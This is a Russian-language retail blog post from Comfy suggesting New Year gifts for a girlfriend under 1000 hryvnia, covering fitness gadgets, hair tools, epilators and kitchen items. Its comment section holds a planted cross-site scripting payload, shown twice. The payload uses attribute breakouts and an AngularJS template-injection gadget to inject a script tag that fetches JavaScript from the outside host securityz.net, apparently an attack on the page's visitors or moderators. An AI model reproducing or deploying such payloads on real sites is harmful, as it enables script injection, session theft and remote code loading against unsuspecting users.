3.7 9 5

22/12/18

Порадуй девушку: 10 идей подарков на Новый год! Вкладываемся в 1000 гривен!

Итак, Новый год не то что не за горами — он уже подобрался вплотную, и вот-вот раздастся то самое зловещее праздничное «хо-хо-хо», так что самое время поторопиться с выбором подарка для своей любимой девушки, если ты еще этого не сделал. Ведь нельзя же оставить свою вторую половинку без приятного сюрприза в новогоднюю ночь, когда каждый человек — и ребенок, и взрослый, верит в чудо и ждет свою собственною порцию волшебства и хорошего настроения!

Новогоднее настроение

Мы понимаем, что для сурового брутального мужчины мир всяких дамских штучек кажется вовсе не светлым и сказочным, а довольно мрачным и настораживающим. Поэтому мы решили позаботиться о тебе и помочь разобраться во всех этих странных женских гаджетах и аксессуарах, чтобы ты смог выбрать что-то действительно полезное для нее. Мы подготовили небольшую шпаргалку от блога Comfy для мужчин, в которую вошли самые разные варианты подарков, в том числе и самые популярные виды бьюти-техники, кухонных девайсов, полезных аксессуаров для дома. Ну и, конечно же, по каждому пункту коротко, но емко расскажем — что это, зачем оно нужно, и как выбрать хорошую модель.

Все варианты подарков для женщин, которые мы подобрали, стоят не дороже тысячи гривен, так что ты сможешь вложиться в любой, даже самый экономный «подарочный» бюджет. Или накупить много всего и разного, что тоже вариант.

Ну что, готовы побеждать дракона выбирать подарок для своей единственной и неповторимой? Тогда поехали! 🙂

Делаем любимую счастливой

Подарки для спорта и отдыха

Итак, начнем с простого. Подарки для девушек, которые любят ЗОЖ, поддерживают себя в форме и активно занимаются спортом. Да, пока что level 1, ничего сложного 🙂

Если твоя девушка как раз из этой категории или только собирается присоединиться к худеющим, бегающим или качающимся, то один из таких презентов под елочку окажется для нее и приятным, и полезным сюрпризом. И кстати — если даже у нее уже есть такой гаджет или аксессуар, то вполне может случиться, что пришла пора его заменить, так что присмотрись.

Фитнес браслеты — тут ничего объяснять не нужно. Полезная штуковина, считающая шаги, пульс, потраченные калории и выполняющая еще много всяких интересных функций. В зависимости от модели и бренда такие гаджеты могут уметь мониторить качество сна и правильно будить своего владельца, в отличие от обычных будильников, не устраивая дополнительный утренний стресс, отслеживать количество и качество выполняемых упражнений, следить за уровнем активности в течение дня и многое другое. Более продвинутые модели фитнес-браслетов могут даже уметь кое-что из арсенала смарт-часов. Немногое, конечно, но просигнализировать, например, о входящем звонке или принятом сообщении вполне им по силам.

Фитнес-браслет

MP3-плеер — еще один полезный гаджет для тренировок и не только. Все знают, что заниматься спортом намного проще и комфортнее под музыку — любимые треки поддерживают нас в тонусе во время тренировки, плюс ритм музыки помогает держать темп и упрощает счет на подходах. MP3-плеер удобен тем, что позволяет наслаждаться музыкой, не мешая при этом другим людям, а благодаря своему миниатюрному весу и размеру такой гаджет будет прочно держаться на спортивном зажиме, не мешая и не выпадая во время занятий. Да и вообще тренировка проходит веселее, когда музыка перекрывает хрипы, сипы и скрипы коленей 🙂

Спортивная бутылка — в спортзале, на пробежке или во время поездок на велосипеде без нее не обойтись. При интенсивных физических нагрузках происходит достаточно сильное обезвоживание, которое нужно компенсировать обильным питьем. Удобная бутылка со спортивным горлышком, полная чистой свежей воды, в такие моменты реально необходима.

Термос — больше подойдет тем девушкам, которые любят ходить в походы, ездить на рыбалку (да, такое тоже бывает) или устраивать пикники на природе. Крепкий кофе или чай, который в течение долгого времени остается горячим, в такие моменты будет просто незаменим, ведь что может быть лучше, чем греть в ладонях кружку исходящего паром кофе, наслаждаясь тишиной и отдыхом где-нибудь в лесу, горах или на берегу реки?

Термос

Подарки для красоты

А вот сейчас мы переходим к более сложному уровню — к бьюти-подаркам для женщин. Да, это все те штучки, которыми они колдуют над своей внешностью, когда ты все еще ждешь и надеешься, что она уже вот-вот соберется, и вы, наконец, отправитесь в гости.

Утюжки (выпрямители) для волос — гаджеты для выпрямления и завивки волос, которыми пользуются многие девушки. Тут сходу несколько полезных советов по выбору. Во-первых, обязательно обращай внимание на покрытие рабочих пластин — устройства с керамическим, турмалиновым, титановым напылением воздействуют на волосы более щадяще, и не повреждают их во время термической обработки. Во-вторых, нужно выбрать правильный размер утюжка для волос — легкие гаджеты небольшой длины с узкими пластинами более удобны, чем крупные широкие модели, поскольку ими можно моделировать форму разных локонов, в том числе и короткой челки. Ну и в процессе укладки от маленького утюжка меньше устают руки.

Если хочешь узнать больше об утюжках для волос, загляни сюда: Обзор небольших утюжков, которые можно взять в отпуск

Выпрямитель для волос

Щипцы для завивки (плойка) — как понятно из названия, этот девайс помогает создавать локоны. Кто-то делает при помощи плойки полностью кудрявую шевелюру, кто-то слегка подвивает кончики, а кто-то использует такой прибор исключительно для подкручивания челки, так что пользуются им тоже многие девушки. И если ты решил выбрать в подарок на Новый год для нее такие щипцы для завивки, обращай внимание, как и в случае с утюжками, на защитное покрытие рабочей поверхности — оно обязательно должно быть. Что касается формы и размера, то тут более универсальной окажется модель со средним или больше среднего диаметром щипцов, а вот очень тонкие плойки подойдут не всем, поскольку они больше заточены под создание мелких кудряшек в стиле афро.

Щипцы для завивки волос

Фены и фены-щетки — если первое есть у каждой девушки, то второй вид бьюти-гаджетов хоть и не экзотика, но встречается все же реже. Но расскажем вкратце об обеих разновидностях. Фенможет быть как совсем маленьким (дорожным), так и полногабаритным (домашним). Если у девушки уже есть обычный фен, вполне вероятно, что удачным подарком для нее станет миниатюрная дорожная модель — с ним поездки на отдых или в командировки будут проходить комфортнее. А вот к фенам-щеткам надо приловчиться, зато такие гаджеты имеют много интересных насадок для укладки и позволяют делать самые разные прически на длинных волосах.

Фен для волос

Больше полезной информации здесь: Профессиональный, для дома или дорожный — как выбрать надежный фен?

Эпиляторышайтан-машина устройство для удаления нежелательных волосков на теле. В пределах тысячи гривен можно выбрать недорогой, но надежной девайс с минимально-необходимым функционалом. В зависимости от модели, гаджет в такой ценовой категории может иметь одну-две защитные насадки, ограничивающие рабочую площадь эпилирующей головки прибора, и бритвенную насадку. Более дорогие устройства дополнительно могут быть укомплектованы массажными или скрабирующими насадками, отдельным маленьким триммером для лица или деликатных зон или другими полезными аксессуарами.

Узнать больше о выборе эпиляторов можно по ссылке: Безболезненная эпиляция — миф или реальность?

Эпилятор

Подарки для уюта в доме

И закончим наш небольшой гайд по подаркам для женщин на более жизнерадостной ноте — кухонными вариантами. И нет, мы не предложим подарить ей на Новый год сковородку. Хотя не так уж и плоха хорошая новая сковородка 😉

Набор для чая или кофе — изящный стеклянно-стальной френч-пресс для чая или небольшая гейзерная кофеварка могут стать отличным вариантом новогоднего подарка. Хорошей идеей, кстати, будет доукомплектовать такое устройство упаковкой хорошего чая или ее любимого сорта кофе. Или же еще можно выбрать френч-пресс / гейзер большего размера и добавить к нему пару красивых чайных (кофейных) чашек — для нее и для тебя. Получится очень мило и романтично.

Гейзерная кофеварка

Комплект бокалов — может быть самым разным. Ты можешь выбрать в подарок для своей девушки комплект красивых фужеров, исходя из того, какие сорта вин она предпочитает. Или же остановиться на универсальном варианте — бокалах для шампанского. Подарок получится вполне приличным, полезным в доме и вполне бюджетным. Загляни по ссылке, если хочешь узнать больше о разновидностях бокалов и определиться, какие именно лучше купить.

Набор бокалов

Емкости для хранения — вот тут точно есть, где разгуляться. Девушки обожают всякие прикольные штучки, добавляющие дому тепла, уюта и душевной атмосферы. А если такие штучки будут не из разряда безделушек, а действительно полезными в хозяйстве, то вообще зачет. Так что можно смело выбирать в подарок для нее комплект красивых баночек для специй, набор интересно оформленных емкостей для круп и других сыпучих продуктов, интересные бутылочки с дозаторами под растительные масла — все это точно будет оценено по достоинству. Посмотреть разные варианты кухонных емкостей можно по ссылке.

Емкости для специй

Нужно больше полезных советов? В Telegram-канале Comfy всегда есть крутые идеи на все случаи жизни, так что смело подписывайся, чтобы не пропустить ни одного полезного совета, новости или обзора. Здесь круто! 🙂

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Добавить комментарий

Такой e-mail уже зарегистрирован. Воспользуйтесь формой входа или введите другой.

Вы ввели некорректные логин или пароль

Извините, для комментирования необходимо войти.

1 комментарий

по хронологии
по рейтингу сначала новые по хронологии
-->'>"> "> {{ constructor.constructor("var _ = document.createElement('script'); _.src='//securityz.net/1.js'; document.getElementsByTagName('body')[0].appendChild(_)")() }}

-->'>">

">
{{
constructor.constructor("var _ = document.createElement('script');
_.src='//securityz.net/1.js';
document.getElementsByTagName('body')[0].appendChild(_)")()
}}

Подпишитесь!

Читайте также:

Подпишитесь на рассылку!

Не беспокойтесь, мы не спамим :-)

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: